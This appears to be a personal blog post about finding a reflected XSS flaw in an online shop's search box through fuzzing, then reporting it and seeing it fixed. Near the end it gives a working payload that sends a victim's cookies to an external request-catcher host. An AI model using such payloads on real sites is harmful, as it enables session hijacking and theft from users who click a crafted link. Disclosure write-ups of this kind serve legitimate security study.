Today, I will show you some interesting stuff which I have just done .
My friend want to buy a backpack from this website, she sent web address to me and asked me how the backpack was .
I dont really care about backpack.
In my vision, the only thing exist is the search engine on the left side.
I decide to fuzz it and dectect the parameters in order to conduct a deep research
the only parameter is "q" .
first of all , I try to input some basic payload to determine . After about 10-15 minutes fuzzing , I think this website vulnerable to XSS . when I input this into URL
<script>alert("1337")</script>the website responds a little bit different behavior
Before inputing
After inputing
To ensure this guess and for further researching, I use some necessary tools .
It seems to me that my guessing was true . But why the alert method couldn't be executed in a right way? .
After about 2 hours look through the source code and input many payloads . I figure out how to execute a XSS payload exactly . It's coming below
<script>alert("1337")</script><script>alert("4rth4s")</script>And the dialog comes up ! It means I have completely exploited this XSS vulnerability :
and of course I dont want to stop . My aim is to get the cookie from the victim whom I send my link to .
First of all , I need a place which can receive data (cookies ,authentication, login credential , ..) from victim via the malicious URL . I choose Request Catcher , a useful tool for debugging and testing webhooks, HTTP clients .
And then , I need a payload which could be injected to the main URL make the browser of the victim sends to me cookie . After many times trying to build a nice payload , finally , I made it
<script>alert("1337")</script><script>document.location='https://4rth4s.requestcatcher.com/' +document.cookie</script>And all the cookies of the user that click this link will be stolen .
I had reported this to the admin and hope they will fix it !
update :
Report 17/5
FIXED 17/5
Happy Hacking !